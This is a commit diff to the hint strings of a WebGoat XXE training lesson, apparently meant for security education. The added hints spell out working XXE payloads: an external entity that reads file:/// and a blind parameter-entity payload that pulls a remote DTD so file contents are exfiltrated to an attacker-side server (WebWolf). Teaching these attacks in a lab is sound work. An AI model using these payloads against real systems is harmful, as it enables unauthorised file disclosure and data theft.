Extended and fixed some lessons

webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties

@@ -30,9 +30,17 @@ xxe.content.output=Welcome {0} you can now login to our website
 xxe.blind.output=Contents of the file is: {0}
 
 xxe.hints.simple.xxe.1=Try submitting the form and see what happens
-xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
-xxe.hints.simple.xxe.3=Try to include your own DTD
-xxe.hints.simple.xxe.4=Try to include a doctype "(<!DOCTYPE...)" in the xml
+xxe.hints.simple.xxe.2=Use ZAP/Burp to intercept the request and try to include your own DTD
+xxe.hints.simple.xxe.3=Try to include a doctype "(<!DOCTYPE...)" in the xml
+xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
+xxe.hints.simple.xxe.5=Do not forget to reference the entity
+xxe.hints.simple.xxe.6=In the comment you should references: <comment><text>&root;test</text></comment>
 
 xxe.hints.content.type.xxe.1=Take a look at the content type
-xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
+xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
+
+xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
+xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
+xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
+xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
+xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>